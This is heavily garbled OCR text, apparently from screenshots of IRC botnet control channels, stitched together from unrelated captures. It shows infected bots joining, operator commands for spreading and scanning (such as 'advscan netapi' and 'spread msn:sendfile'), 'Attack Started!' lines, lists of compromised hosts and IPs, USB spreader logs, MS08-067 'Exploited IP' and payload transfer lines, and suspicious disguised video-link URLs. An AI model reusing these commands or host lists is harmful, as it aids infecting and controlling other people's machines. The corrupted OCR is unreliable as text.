szBisBuffer[{ 0x5000 
Curbuf[ 0500 


}* {0} 


1+ ¢€0> 


PROCESS ALI_ACCESS, FALSE. pe32.th3 
* uStertAddr: uCurAddr <* uEndAddr; uC 


HANDLE hProcess + OpenProcess 
( uCurAddr 


Ln3ic 
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i 


82) 2] 


) (Connection reset by 


[19:20] © Joins: [80)ISL[565888] (COMPUTE 


[19:20] * Quits: [00jUSA|109413] 


peer) 

[19:20] © Joins: [8O/EGY|821514] 

[19:20] = Quits: [60|FRA|908586) (Ping timeout) 
[19:20] * Joins: [60)MLD[ 420035) 

[19:20] = Joins: [22|GBR|782977] 

[19:20] * Joins: [64/USA| 100846) 

(19:20] = Quits: [00)GBR|715230) ) (Co 

peer) 


[19:20] * Quits: [00)SWE,393501) Ping t 
[19:20] © Joins: [80)ESP|843461] 


> YF 
[19:20] = Quits: [60|]DNK|308931] ( a 


peer) 


[19:28] = Quits: [68)USA|S579187) ing timeout) 
[19:20] = Joins: [6@j)USA{943275] 253) 
[19:21] * Joins: [80] HUN| 366133] ) 
[19:21] * Joins: [80)/USA|[524698] . 
[19:21] * Joins: [82|SWE[640262)] ct 
[19:21] = Quits: [00)CZE,790912] (ALEX-51 (Ping timeout) 
[19:21] © Joins: [80|MLD| 196825] (KERIMGS 
[19:21] * Joins: [88)USA|740516] (HASEE 23) tf bn 
[19:21] = Quits: [61|/USA|956383] ing timeout) 
[19:21] = Joins: [85|SWE|964086) 
[19:21] * Joins: [60|SWE| 609561) ) 
[19:21] * Joins: [08)/C2ZE[ 408619) 
[19:21] = Quits: [00)POL[366470) 
. 


[19:21] 


(Ping timeout) 
Joins: [00)NOR|627427] r| 
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~_ 2373] eine) 
wl @o\/Zygoalirfedcsd seis 


| oan FOREN OEE 
OY HTTP 1.4 tOree | Sever ending ® Channels Ust 


= LEMLESPIXPI555781 (NESU3b@190.80.186.25%) Quit (Pina timeout) 


= (YY MITPLA tnx 
= ©) Channek 2 
ee 
| ree 
Channels List 


» @tenix + 
paras 
[ARG|XPI2 
[ARG|XP|4 
[AUS|XP]S 
[BEL|XP|1 
[BEL|XP|2 
[BEL|XP|3 
[BEL|XP|S8 
[BGRIXP|9 
[BRAIXP|O 
[BRAIXP|O 
[BRAIXP|O 
[BRA|XP|1 
[BRA|XP|1 
[BRA|XP|1 
[BRA|XP|2 
[BRA|XP|2 
[BRA|XP|2 
[BRA|XP|3 
[BRA|XP|S 
[BRA|XP|S 
[BRAIXP|4 
[BRAIXP|4 
[BRAIXPIS 
[BRA|XP|S 
[BRA|XPIS 
[BRA|XP|7 
[BRA|XP|S 
[BRA|XP|S 
[BRA|XP|S 
[BRAIXP|9 
[BRAIXP|9 
[BRAIXP|9 
[CAN]US|8 
[CAN|XP|2 
[CAN] XP|2 
[CAN|XP|2 
[CAN] XP |S 

~ [CAN|XP]S ~ 


SOOT Master Chent 


Quconect «Settings «= Abas 


Bows | On om commands same | 


Serene werncn | 140 
Opecsmon ryctne ‘we lindowt 
Uptine: | 2 days. 9 hous, 04 wwe 
Pook 62 
Peak time: (03 days, 02 hourt and It manutes ag 


Chere: 


befectron 


Newy rtected |§ 


feereage rereading iste 


Total cherts: 26 Wer Vestors: © Masters: 1 
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Total heres: 
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| Bots | onan command | suse | 


WIV IWII95 


7 


/7/ 3 


10) 5/| CC TT 


| == 


forermsr 
von} 


oe 


Masters: = 


aldlx! 


2008. 10:17 
oer. 9PM 
on 

203, 7.5 
2003. 

08. § 

ner 

28. So" 
2003. 9.16PM 
200s. a47 PM 
2005. 6.00PM 


sod, 41 PM 


a, mIRC 6.17 with NotameScript 4.03 =o (x | 
File View Favortes Tools NoNameScigt Window Help 


ve aims Hei Sf & - i G&- @- fe 
Net: ‘ 4 \ J - oes 


17) #teastoosh ~ [= 
= UM bares 
eo Garents 1 [20118] [+cCmMasta¥): Ispread msn:sendfile -atm:sendfile -synscan: dcoml 35 asnt 35 -setthreads 130 


[T) ecarding.nw 
] ori 


tar , 
|) Aten 


.crac 
©) Querets 
[D) sei sore 
Fl ameIRC 
= (ow: 
[T) #letby 
+) ADHeLL Met 
» ©) Guerets 


Abjects 
= ) Gurrels 
Netaplite 


¥ 
Poy etart™ ) e re BS PT 28, wendows Live Messen Dam WD eihC 6.17 eerie... Fl TES S&S > - Conwversmicn C 5:26 PM 
; - ; Friday 
ans 


Sp CSK2 WORE (E>) Crees D plorrere 1.6.1 DF itunes | yee? 
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) File Teoh NNScript Window Help -\@ 


WM oe ok ne 
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"; mIRC -[ (1937) [+m™Mnstul: #advscan metapi 220 4 0 +r -b -s -a] 7 =18) x) 
TT) Fle Wew Favortes Tools Commands Window Help =18) x) 


A gG@eVQgod0os GSS VO GH\ss3 


[2K3] | 484 
[2K] | 9005 
[2K] | 0016 
[2K] | 0051 
[2K] | 0864 
[2K] | 0065 
[2K] | 9081 
[2K] | 0165 
[2K]| 0179 
[2K] | 0286 
[2K] | 8374 
[2K] | 406 
[2K] | one9 
[2K] | one1 
[2K] | 0897 
[2K] | 8526 
[2K] | 9531 
[2K] | 0591 
[2K] | 8659 
[2K] | 9687 
[2K] | 9693 


[2K] | 8742 
(ee [on leree 
scan netapi 226 45 8 -r -b -s ~a’ 


pte. [2K] | 8765 
nm Sun Dec 18 O1:57541 [2K] | 0806 
[2K] | 9822 


= [2K] | 9885 
[XP] | 45105568 joined [2K] | 8899 


[XP] | 3741160 joined [2K] | 8949 
[XP] | 82020398 joined [2K] | @974 
[XP] | 13536678 has joined [2K] | e982 
[XP]]21795381 has joined [2K] | 999 
[XP] |60983134 has joined [2K] | 1067 
[XP] |] 18361395 has joined [2K] | 1067 
[2K]|93655141 has quit IRC (Connection reset by peer) [2K] | 1068 
[XP] |/50115591 has quit (Ping timeout) [2K}| 1978 
[XP]]62087581 has joine [2K]| 1998 
[XP ]]"6747223 has joined [2K] | 1184 
[2K] |66727483 has quit IR ng timeout) =) 62K111172.) = 


| 
DP eathdiaea DO 


* Now talking in 
Topic is *tady 
Set _b 
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rhe Wew Fevorties Tools Commandi Window Het> 
A GeO oocs BOO G0ST3 8 
‘Dee | CS 


USA-@e8]1X2eU0n|EM] has joined 


2}_USA- 8B] SOSUI 264) EIw| 


“TTA 088] PucTean| ITA} has quit IRC (Connection reset by peer) USA OBB] SOsJpnl j/ ery) 
_ITA=@@@|ROKRPOD| ITAL) has joined gammy _USA~ 888] SUASUCO| EM) MY 
“11h-999|2T7zpAZF [ITAL has quit IRC (Connection reset by peer) Ss oO Vv “USA~ GOB] SuMBNYP | EN | 
_ITA=@@@|d7K22P ne |1TA[M] has joines GB . _USA~ SOB] Sy ANZ JC LEM] MY 
DEL @@@]UZIZFIRC|FROIM] has quit IRC (Ping tineout) _USA~ OBB] S2Fhe tH | ENO) 
_ITA=@@@|URUUNON| ITA] has quit IRC (Connection reset by peer) USA BBB] GAMAQHI | Era | HM] 
_USA=@@8|VTEKTAM|CMU|M] has joined Im a _USA~ 808] GFP mqOS | Et | MY 
_EGY=@@8/pQOF Zar | ARE |) has quit IRC (Ping tineout) _USA~ 8OB] 6g0G212| EM) 
_SUM-@@@]ouS7hum| SLU] has quit IRC (Connection reset by peer) _USA> OBB) 6GunG 1th | Cre] My} 


(Ping tineout) _USA> @OB] 6 LenUTSK | LMU | My 
RC (Connection reset by peer) _USA~ @00) 6 juxev? | CMa) My) 
_USA> 808] 6L gSonae | Er] 
_USA> @BB] 6oRKSs0 | EM] MY 
_USA~ OBB] APSzaTOT | LMM] My 
USA~ OBO] GAFL FPHD | Era |] 
USA» OBB] 6SazAtA EM |My] 
USA~ OBO] 61 JoXe ot | Era | My 
USA~ OOO] 6txOICq | EM] My] 
~ 800) 6uaun?r | EMe| 
800] GyCwul 7 | Era] My 
USA~ SOB] 73et L9OE | EN) My 
USA~ @OB] 77 AMY Ux | Ere) My 
USA- S80] 7a7EStal Ere) 


_1TA=@@t/OOtykPy| ITA] has quit 
_ SUM @88|qna6unbe|SLU|M] has quit 
©088|k2nIJnw| CNG ]M] has joined 
OM @80] 7 faaaibK/OSOjN) has joined 
_ITA=@@8]O0Kawue | ITA, has joine 
ITA  @@8]owrh25P)1TA| has quit IRC (Software caused connection abert) 
“SUM @@@/ ROZHKTK|SLU| MH] has quit IRC (Ping tineout) 

“FAA=@*8| KOLDIGGHIFRA, has joined 
“TT A9@@O] UJ06Ku2 | TTALH] has join 
“ESP+ 080] 020W7Ke [ESH|M] has joined 
_F 1H @@@|nphocak|FIHji] has quit 1 
“1TA-@@@| USHYAsge|1TAIH] has joined 
ITA-@@@|CijferumjlTAjmy has quit IRC (Connection reset by peer) 
SUH- 228) BUBnyxcJj SLUM] has quit IRC (Ping tineout) 


c's 
wa 


tion reset by prer) 


“WAU~@@8| JDOx6alll |[HRUI NM] has quit IRC (Ping tineout) _USA> @O8] 764 fubIHy ENE | My 
_USA~ 88] 2ppX9y9sEHU]M) has quit IRC (Software Caused connection adert) USA~ OBB) 7CPQnaot | EM) 

_1TA- 88] y6cFauCl|ITAIM) has quit (Ping tineout) USA- OOO] PdughC! [EMI | My] 
“1TA-@@@|DTHE@HS|ITAYH) has joined USA- OOO] 7H2920u0 | EMM | HM] 
_SUH- 888] UrcOltni|SLUIH) has foined| USA- O08] 70x IreA, EMD | My] 


USA- 880] 7QQKOFSS | EM] 
USA- OBO] 7tFOgKE [EMU] NM] 
USA- 880] 7UipI 7A | EM] 

USA- OBO] TUTHKPA| EMM] 


_ITA~@@@ | kyCUROUK ITAL) has quit If 
_1TA-@@@| TKKINSELJITA[H] has joined 
_ITA-@@8|hAKap7cS|ITAIM] has quit IRC (Connection reset by peer) 
1TA-@@8/ELtZ0J3y{1TA] has joined 
ITA-@@@| THEUP SRE TTALN] has joing 
ITA-@@@|LIFCISELITAIN] has joined 
SWE-@88|UEHs862|SUE| MH) has joined 
ITA-@@8|CCUCIsus|ITA\H] has foine 
ITA-@@@| poRs@sLIjITA] has joined 
ITA-@@@| sWkI6qgo; ITA] has quit IRC a 
FRA-@@8| eKtOnEY|FRAIH] has quit IRC (Connection reset by peer) al 
BIH-@88] 19DgLDH|BSBIM] has quit IRC (Software caused connection abort) _USA- 888] BcAnered | EMU | HM] 
SUN-@88|UH1EQG9|SLUIM] has quit IRC (Connection reset by peer) _USA- OBB) BCESAJa| EMD) NM) 
HRU-@8@|UGoxAKua/HRUIM| has quit IRC (Ping tineout) _USA- 88) BF6qOgxr | ENMU] MH] 


tion reset by peer) 


“USA- OO] B2kNGED | EN |] 
“USA-@0O| BAOGEEN | EM] 

tion reset by peer USA-ObO| 88XSSu77 | EMU | Hi] 

o ; USA-00| BBRCSU7 | ENB] 


“TTA-@8@/DEXISKILIITAIH] has quit IRC (Connection reset by peer) USA-888| BF¥qdzC | EMU] 

“1TA-@8@| Or POCFHE|ITAIH] has quit Ping tineout) USA-BB| BHKHOATw| ENB] 
“TTA-@88] IKEJDRD|TTAIH] has foin USA-@OB| BKS O75 | EN | H 
“1TA-988| 5VFtBYzuIITA] has quit 1 USA-Ob8| BKATHOZa| EM] 


tware caused connection abert) 
“SUN-@88| IpDISBJF|SLU] has joined USA- OBB] BLLunju7 [EMU] My] 


_ITA-@@@|KUTHRGCIITA] has quit IRC (Connection reset by peer) _USA- 888] HAs vey | EM) My 
_ITA-@@@|MVEOGIE| TITAN] has quit IRC (Connection reset by peer) _USA- SBR] AnggdC1 S| Era | HM] 
_SCG-888] OCF UbDTKISRLIM] has quit IRC (Ping timeout) USA- O80] BO8eL KG LEN) MY) 


USA-@OB| Soraya | EN | Ht] 
USA-®BB| 8S6zuk2 | EMU] 

USA-8BB| Bsqyushk | EMU | Mi] 
USA-S8B| BUGnqgP3s | EMU | IH] 
| “usA-e0e| 


NLD-@@@)| XultesOH|NLD] has quit IRC (Software caused connection abort) 
TTA-@@@|COuUCS7IVI TITAN] has joined 
1TA-888|Uak8ZUUd] I TAIN] has join 
1TA-@@@| 8@@VH2Q/1TA[H] has joined 
SUN-@8@/P3NkpTo[SLU|M] has joined 
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centinela5154 has quit (Ping timeout) 
centinela4345 has quit (Ping timeout) 
centinela5177 has quit (Ping timeout) 
centinelal243 has quit (Ping timeout) 
centinela426 has quit (Ping timeout) 
centinela4638 has quit (Ping timeout) 
centinel#938 has quit (Ping tameout) 
centinelal768 has quit (Ping timeout) 
centinels9009 has quit (Ping timeout) 
centinela2$42 has quit (Ping timeout) 
centinela4635 has quit (Ping timeout) 
centinela7432 has quit (Ping timeout) 
centinelas653 has quit (Ping timeout) 
centinels9363 
cent inela7i26 
centinela9s27 
centanelass77 
centinela2839 
centinela7967 
centinel 479 
centinela2186 
centinelaa973 
centinelaS316 
centinela5s11 
cent inel 29338 
cont inel ai276 
centinela2141 
centinela2616 
centinela7534 
centinela2939 
cent ine]a2432 
centinela7643 
centinelaas@2 
centinelaS$82 has quit (Ping timeout) 
centinela681 has quit (Ping timeout) 
centine1a7484 has quit (Ping timeout) 


(haxOr@cpanel6. fuatadnet 


(hax0r@62 


(haxOr@dspnet . fr.eu.org) 


has quit (Ping timeout) 


ee 


Main 


SelectAll | Deselect All 


7132: 220.46.62.118 
7133: 102.145.198.179 
7134: 19,198,108.39 
7135: 47,203.119.33 
7136: 193.164.170.253 
[V7] 7137: 91.196.54.134 
(V] 7138: 132.198.164.19 
7139: 158.159.212.191 
7140: 207.40.86.153 
7141: 184,.177.155.20 
7142: 144.108.154.190 
7143: $3.96.52.251 
7144: 250.239.105.94 


(haxOr@host03. ipowerweb. com) has joined 


(hax0r@207.218.206.119) has joi 
(hax0r€209. 8.31.32) has joined 
(haxOr@server. yhosty, net) has joined # 
(hax0r@64.191.126.145) has joined 
(hax0r@66. 197.235.1821) has joined 
(hax®r@serverSs, dedicatedusa, com) has joined quam 
212.93.125) has joined 
(haxOr@62.212.93.125) has 
(hax6r@83.211.1.26) has joined 
(hax0r@195. 62.28.186) has joined 
(haxOr@server1463. dnslive.net) has joined GED 
(haxOr@srv4.mw-internet.net) has joined 

s has joined —_ 
(hax@r@213. 189.9.5) has joined AUMm 
(haxOr@cube. blinx.de) has joined 


(haxOr@web3.websitesource.net) has jo 
(hax0r@69.5.64.250) has joined QD 


com) has joined 


joined 


a | 


centinela7633 (hax0r@83, 149.96.169) has joined 
centinelasé23 (hax0r@69.56.199.194) has joined # 
centinelas468 (haxOr@kili.denit.net) has joined <b 


Attack Started! 
Attack Started! 
Attack Started! 
Attack Started! 
Attack Started! 
Attack Started! 
Attack Started! 
Attack Started! 
Attack Started! 
Attack Started! 
Attack Started! 
Attack Started! 
Attack Started! 


SSS ee 


Selected: 7133 


Welcome To HotBot - Developed By Linden 
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=) 9)\x) 


| 4 ops, 1967 total 
fal centinelal074 
centinelal083 
centinelal087 
centinelal0&B 
centinelal0B9 
centinelal095 
centinelal099 
centinelal102 
centinelall09 
centinelol118 
centinelall22 
centineloll25 
centinelall26 
centinelal13 
centinelol 134 
centinelal135 
centinelel137 
centinelal139 
centinelal 140 


centinelol1S3 
centinelallS4 
centinelal 156 
centinelol 164 


Commands & Controls 
Command 


centinelal167 
centinelell7 


(Pee et 
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View tepec « Screenshet's of your wet « Moxie Firetox 


XChats MitIm @ Steatthitet 


Gowerrment, RIAA, ANTI-Piracy & Related Groups: By entering, you are violating 
code 431. 322.12, Internet Privacy Act signed by Bil Linton in 19% 
Therefore you CAWOT threaten cur ISP(s), personis) coapany(s) storing 
these file(s) or using this network and cannct prosecute. 

Please leave this network nav as you are violating cur Teres Of Use & Service. 


ee 
ae 


hit3e 
hitie 
hit3e 
hitie 
hit3e 
sets hit3e 
sets hit3e 


e 
sets © 
e 
. 
e 
® 
e 
sets ® hitie 
. 
® 
e 
. 
e 
. 
e 


sets 
sets 
sets 


sets hit3e 
sets hit3e 
sets hit3e 
sets hitie 
sets hit3e 
sets hitie 
sets hit3e 


are naw an IAC Operator 
GPEPPOTD File is sissing 
There are @ users and 74901 invisible on | servers 
3 :channels foreed 
I have 74901 clients and | servers 
urrent Local Users: 74901 Max: 79274 
Current Global Users 901 Max: 7927. 


DE XChati H1tFes | Steaitnn BH wenown cu - View topic. § 
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Bm I 00 2 : 


SD ree ee Pevwten fee Commench Winter Peep o« 
4éeOQoa og0ceoe0oeo0g0s33 
eT 


i =~ it jm jeans - 
quit IRC (Cliewt exited) “am? 
quit 180 (Conmrction reset by peer) cs 
quit ike tt. 
quit ike it 
quit ine ite 
wie cee 
ote (tse 


bb (to 
qi rat) 
jekne rate 


quit tee ¢ tt po. 
quit ine ¢ cp 
qeit mec ¢ LT hed 
ah i 4 (tine. 
jaine (tne. 
jotees ttre 
= (tine. 
joheee (te. 
joteee tte 
we te 
joined pe 
jotece tthe 
rte. 
jainee (cine. 
jence (tine. 
jotnee cco 
jebece (tne. 
— (te 
ah ne: cto 
jotvee (tp 
jeinee rep 
jotsce pe 
jotnce ree 
jeinee (tire. 
jebece (tine. 
goles (tine. 
. (tne. 
jotnee 
qeit IRC (CLiewt exites) ce 
qeit IRC (Cliewt exited) ct 
sce Sl ite 
jeinee tie. 
quit IC (Clieet exited) ree. 
(tine. 
enites) (tno. 
(tne. 
qrit tee Ce rr) 
joheee cep 
jeinee tt [ve 
jeinee rtp 
jeter tthe 
ne rp 
jeinee tine 
quae tien reset by peer) ad 
prea jelnee ~ ice = 
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3sss .com/youtube.com 

4bond .it/youtube.com 

ac2j .com/freeemOvies 

aced1979 .freehostia.com/yOurfilm 
alexandrialocksmith .net/uncensOredvideO 
alpha.kei .pl/amalzingfilms 

alruwaithy .com/extrimeperfOrmans 
astoundeddesign .com/privaledemOnstrati0n 
awwfuck .me/fuunnyactiOn 

baddog.me .uk/uncensOredclip 

bbckzoo .com/extrimedwd 

bbckzoo .com/mmyperfOrmans 

be. la/freeefilms 

bencaputoprinting .com/cOOlfilm 
bicentenario.sc49 .info/mmyfilm 
bighornrivercabins .com/cOOlvids 
biskopsto .fo/fantasticmOvie 

bloch-data .dk/cOOlvids 

bokongerslev .dk/amalzingmOvie 
bokongerslev .dk/extrimeactiOn 
book-dalmose .dk/extrimeperfOrmans 
campionariadigalatina .it/youtube.com 
carlamo .com/extrimeclip 
centerforyourhealth .com/extrimemOvies 


centralbaptist.org .au/fantasticvideO 
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Fie View Favorites Tools Commands Window Help 


a TF Go Zysacfaed i t2e2 


| " i ([LNO)][UsBjaejengdo « 
(LNO)[UsB)ruoxyfgn: (Version) Spreader (LNG) (UsB)aghnmhpt 
(LNO)[UsB]itdpjkfe: [Version] Spreader (LNG) [UsB Jagtckujn 
[LNO}][UsB]dphcpadn: [Version] Spreader (LNO][UsBjagtiznth 
(LNO)[UsB)tkjvhcdx: (Version) Spreader [LNO)[UsB)ahatilwac 
[LNO)[USB)npnfrkba: [Version] Spreader (LNG) [UsB Jaicsnyhr 
[LNO}][UsBjaldsiwmb: [Version] Spreader [LNO][UsBjaigyutip 
(LNO)[UsB)urlfnrajn: [Version] Spreader [LNO)[UsB)ajdgbbri 
[LNG)[USB)yqcvujgn: [Version] Spreader (LNG) [USB ]akun jdFF 
[LNO)][UsB]bbxoocrw: [Version] Spreader [LNO][UsB]aldsiumb 
(LNO)[UsB)ytwcthxp: [Version] Spreader (LNG) [USB ]amhuobhn 
(LNG) [USB )Nhqkduas: [Version] Spreader (LNG) [USB Janpphbvl 
[LNO][UsB]sewitanl: [Version] Spreader [LNO)][UsB]apwafkzt 
(LNO)[UsBjetauuind: [Version] Spreader (LNO)[UsB)asffjole 
(LNO)[USB)pitefdaq: [Version] SB Spreader [LNO][UsB]aszceifp 
[LNO}[USB]yqahswgn: [Version] Spreader (LNO)[UsB)atfnyzea 
(LNO)[UsB)bxwkvune: [Version] Spreader (LNO)[UsB)avayqxar 
(LNO}[UsB)ctdsliii: [Version] sB Spreader (LNG) [UsB)axucapre 
[LNG] [UsBjerbshiea: [Version] Spreader (LNO) [USB jayulyzyp 
([LNO)[UsB)ovnguxgj: [Version] Spreader (LN6) (Usb }bbahbxdy 
([LNO][UsB]Fcdtxjyb: [Version] SB Spreader (LNG) [Us8 ]bbhzqFhd 
[LNG] [UsB]geytnost: [Version] Spreader [LNO)[UsB ]bbuetbqj 
(LNO)[UsB)dhpkwqag: [Version] Spreader [LNO) (Usb jbbxoocrw 
(LNO)[UsB)krdcefhc: [Version] SB Spreader -» [LNO) [Us8 ]berdount 
[LNO)[UsB]taurxhix: [Version] Spreader [LNO][UsB ]bcezysfee 
([LNO)[UsB)snpakarq: [Version} Spreader © [LNO][UsB]bdaxxinn ¥ 
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Widow Help 


YSoea Ces taiww bos 


ned wikeNonedther 
([UsBlodukskpu (“LNG@CIA.COU-6ASFDES3 .dyn.optonline .net) 
hed SLikeNonedther 
[UsB)oghwptkz (LNGBCIA.GOU-BFSSF46C .karoo.kcon.com) has 
SLikeNonedther 
[USB] qzyrujnt (~LNO@CIA.GOU-AIGSESES .dsl.scarlet.be) has 
SLikeNoneOther 
(USB) fpfwbtzq (~“LNGR@CIA.COU-3A721323 .dub-3rk2 .metro.digiwe 
as joined SLikeNonedther 
(UsB)qjlaygyz (“LNO@BCIA.GOU-AED27E70 .dip.t-dialin.net) 
ned #ikeNonedther 
bwxsrxeo: [UsB] Infected Drive L: 

[UsB)hoyzquir (“LNOB@CIA.GOU-FFE56B69 .ip98 .fastwebnet .it) 
hed MikeNonedther 
(UsBjudybzrvul (~LNO@234428F3 .BF64FSA7 .£3452292.1P) has 
SLikeNoneOther 
[USB] dhpkuqag (“LNG@whw@CE7B9802 .ABBIS4FE .EBC25752.1P) has 
SLikeNoneOther 
[UsB]llxqnuxw (“LNO@BB7D9CCDE .1274BE29 .6682967A.1P) has 
SLikeNonedther 

__UsB]nkjbhbet: [UsB] Infected Drive F: 
(UsB)lacwukix (~LN@@17562985 .D5AD758D .77602B8F .1P) has 
SLikeNonedther 
(UsB]krdcefhic (~LNOB17CO94BF .895781AS .CB171EEB.IP) has 
SLikeNoneOther 
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[UsB]aejengdo « 


(Us )aghnahpt 
(UsB]agtckujn 
([UsBjagtiznth 
(UsB)ahatlwac 
(Us8 Jaicsnayhr 
[UsB]aigqyutip 
(UsB)ajdgbbri 
[UsB JakunjdFe 
[UsB ]aldsiwnb 
[Us Janhuobhn 
(UsB ]anpxtisn 
[Us Janpphbul 
[UsB jJapwafkzt 
(UsB)]asfFjole 
[UsB]aszceifp 
(UsBlatfnyzea 
(Us Jaxucapre 
[UsB Jayulyzyp 
[UsB )bbahbxdy 
[USB ]bbhzqFhad 
[UsB ]bbuetbqj 
[Us8 }bbxoocrwu 
(UsB JbcrdounF 
[UsB jbczysfee 


[UsB]bdaxximn ¥ 


[1323] [+mnstTuV] ||) | fae] 


11:03:42) - Topic removed by xdR! 
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Commands Window Help 

4/7 Oo GYSsaites eeiveiSaas 
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| Fle Weew Fevortes 


@onicx « 


(14:31) © Mew talking in Seuke 

a1) * sets mode: +santits 

triewing Saeke modes... 

34) * Semicx changes topic te *.scam 71.66.x.%° 

1%] * ) has joined 
2-CMOR1IF 7ace 


[14:36] * SS dynamic .ds 
[14:96] * br tr .cox 
[14:36] ; ynamic .plati 

a eee 
t telkomadsl 
{ as joined tm 


C—O 


| Reet 


jetstrean.« 
Ase. digpend.net.au) has joined Snuke 


Ne .res.rr.com) has joined Snuke 
bee —— = cnr Quit (Connection reset by peer) 
epls.quest.net) has joined Snuke 
cal.res.rr.com) has joined Snuke 
amtelecom.net) has joined Snuke 
@51 kimi .ameritech.net) has joined Snuke 
O51 .kimemi.ameritech.net) has joined nuke 
ue. woosh.co.nz) has joined Snuke 
dslextreme.com) has joined Shuke 


————<— claro.net.br) has joined Snuke poet ¥ 
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+ [O8[FRA|BI7NIT) (XP-197N091-169-109-127.rev. 
* [O8|FRA[6681S8) (XP-87790ALi11e-257-1-187-68 
= [108] NRU) 86982) (xP-0827089-172-202-192.ads1. 


= [8|THA|219837) (XP-eaageppp-124- 
425 


© [MOS/ESP|30898) (XP-1708062 57. 139.175 dyn. 
© [08] R/ 77999) (XP-7970084.298.195.56) has 

© [8] FRA|69072) (XP-1280087 248,249.18) has 

© [O8/FRA[ 249993) (XP-S369@dyn .casa2-74-298-12- 

© [0008] THA]28918) (XP-S8998125 .2%.119.96.ads1. 

© [OO|USA[AASAO?) (XP-876908%,228 45.287) has 

© [ee| SVE) ee272) (xP-296S8212 

* [88[NL01636618) (xP-R992077 [oojant (2 

* crinsry is now know as crin [oojant |2 =) 
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yes] 
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| xP Sz] 
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| xP 12] 
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* (eejxrysr2)} 
+ (eejarpsr2) 
folned Standes 
+ (eexrysr2) 
[eejarysrsy) 
[eejxrysrz) 
[@ejxPysr2) 
(ee|sP)sr2} 
[eejxrysr2) 
[e0)xP5sr2} 


{eojarisrz} 


42 


}iews (Sau 
1FLe (useet? 
TepeTk (usee 
Pile (usaese 
wt (use? 
AL fet (eu 
sore (useait 


Emasoylé (58 
rk (Seer? 
tera -_ 


joined Shanta 


Frew, (Sau 
FYnCOROTy (CORI? 


prnctett (USAES®. te 
DGqneGqne (use 

Pec kye (USES 
FarzUelkx (USMS? 
werertoe (etenit? 
qsyhetwer (useatt 
wqqtp) (utearte.¢ 


tory (teewi?s 25 


xP )sh2} 
/aP1SF2} 
[xP SF2} 
|aP|SP2} 
|xPSP2} 
|5P|SP2} 
/xP|SP2) 
xP |SP2) 
hed bie) 
ed bed) 
jar ysrty 
[xPysrt} 
|r pss} 
| xP |S} 


|aP|SP1) 
| xP |SP2] 


aldi x) 


(ea) rea; Sr2) 
[ee] a9) 5"2) 
(0) 73) 5"2) 
(9) 2"3;5"2) 
[ 00) 243; 5"2} 
(#9) 2"3)9°2} 
[e0) 2"3;5"2} 
[8a] xr | SP 8) -ace 
[ee] xr] sPep ar 
FAME VOI CORT ne 


deaa> (MEOS-O67)! Exploited tf: 1 
Orterrict> [K6e8- es txploited 
Oye? [ }: Commection Ustabtis 
Opes? [NTIF]: Transfer Conplete: 
fyrs> [MSO8- O67): Exploited Ir: 1 
cTwawd [Ht Transfer Complete: 
clue [i = Expleited IF; 
oreezrtct> [ = Connection Est 
OrEezrict> (HITP]: Transfer Comp) 
OrEnrrict> [Miee- es Cxploited 
evtrhw> { Comection Estab} 

rhw> [ Iransier Complete 
C¥Erhv> [9SO8- e675: Exploited iF: 
Byrs> [NTIP]: Comection fstabtis 
Oyrs> [NTIP]: Transfer Complete: 
Byrs> [Mi08-067}; Exploited IP; 1 
Oyrs> [NTIP}: Comection Establis 
fyrs> [HTTP]: Transfer Complete: 
byrs> [mse i Exploites tf: 1 
KILiCurk> [TIP]: Connection Esta 
atvlg> gatt Transfer Complete: 
alvif> [Gene txpleited IF: 
IrrtGsoT> | Consection Este 
IrrIGSO1> [RTIP]; Transfer Comple 
Irv IGS01> [MSG8-O67); Exploites 1 


18 
196.3 
7.196.6.123:25618 
+-6.123 (29.00 0B), (Tetal Seeds: 3) 
6.173 
» (Total Senes; 14) 


ot 197. 996.9, 168516755 
7.19.9. 188 (29.00 £8), (Tetal Seeds: 3) 
-196.3.088 
18. 22%.20.13: 18632 
‘*.20.19 (29.00 HD), (Total Sen@s: 1) 
+.78.43 
7.996.6.197-75618 
+6192 (29.08 « (Tetal Seeds: &) 
6.19 
7.106,.6,. 2005 75618 
+b. 208 (29.00 0B), (Total Sends: 5) 
6.208 
-19.66:277088 
Se (29.08 HB), (Total Seeds: 2) 
1.7.04 
0.5 iee-7001 
25.09.1988 (29.08 & 
S.9. 188 


» (Total Sends: 1) 


JH} 


tet 
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Clol> \xdGhTttigg j2ulsJ@@aécewl® 

CrSFdVax¥2W6sfGto> \xckhgd 46x62 
-UINDROZS tk thot yS Is6PyetxyupY .H 
sueze 

CO9VSSDErIuzBGOGKm> \xcKAgd .A6xG21 
-UINVROZS Tk thotyS ts6PyetxyupY .H 
suéze 

Co2wtUL IRI 2WUZKER> \eckRgd .46xG21 
-UIN9EOZS Th Tho tyS ts6PyetxyupY .H 
suéze 

CAPCAATYIGHTFuPpo> \xckRgd .96xG2t 
-UINDEOZS tk ThotyS ts6PyetxyupY .H 
sueze 

ChESTOIS2 jywlrrst> \xckRgd .96xG2t 
-UIN9OZS Tk thot yS ts6PyetxyupY .H 
Sueze 

CjuzowOtas@6xO557> \xckRgd 96x62 
-UINVEOZS th tThotyS ts6PyetxyupY 4 
suéze 

Chas fIkxwel mL C21G> \xckKhgd 486x621 
-UIN9ROZS thtkotyS ts6Pyetxyupy 4 
suéze 

<gIEewy6Gna7@xS81> \xckRgd .26xG21 
-UINVEOZS th ThotyS ts6PyetxyupY 4 
suéze 

<nSadheXasota2t£3> \xckhqd .96xG2t 
-UINVAOZS th thotyS ts6PyetxyupY 4 
Suéze 

<bd82 fSiDBOIqk719> \xcKRqd A6xG21 
-UINVEOZS th thotyS ts6PyetxyupY 4 
suéze 


Clol> \xHPSFOTARHTOTSIPppevaxknc .u 
Seu? .STAeu. 

<hd82 fSiDBOIqk719> \x2D9OKT7 Ta10. 
YCIGO tI wz yx 

<bd82 /SibBOIqk719> \x2D9OKT? 1A10. 
b2gl WO. pxl veUyERt eKHYUD? f2qgHtA 
eSAtt 

<nSadheXnsota2t€9> \x2n90Kt7 1019. 
yCIGO TIw2yx . 

<nSadheXnsota2t£9> \x2n90Kt? taig . 
b2gL WO. pxl VeUYERT eKHYUDT f2qghtA 
esatt 

<rSFdV¥ax¥2WisfGte> \x2D90kt? 1d10 


i need to fix my script a little 
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Index of / 


22:24 


Sea 2 2. Pa 
ttcecececredcde 


certtiletechs .com/fuunnymOvies 
cisaimpianti .net/youtube.com 
claykelley .net/extrimevids 
claykelley .net/mmyvideO 
clubatleticigualada .com/yOurclip 
connoro .com/bestshOw 
consignbuydesign .com/fuunnyttube 


dkflyt .dk/mmytw 
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» [MOGjESP| 06693] has joined ttantt * [GOJARG]O~ a ar 
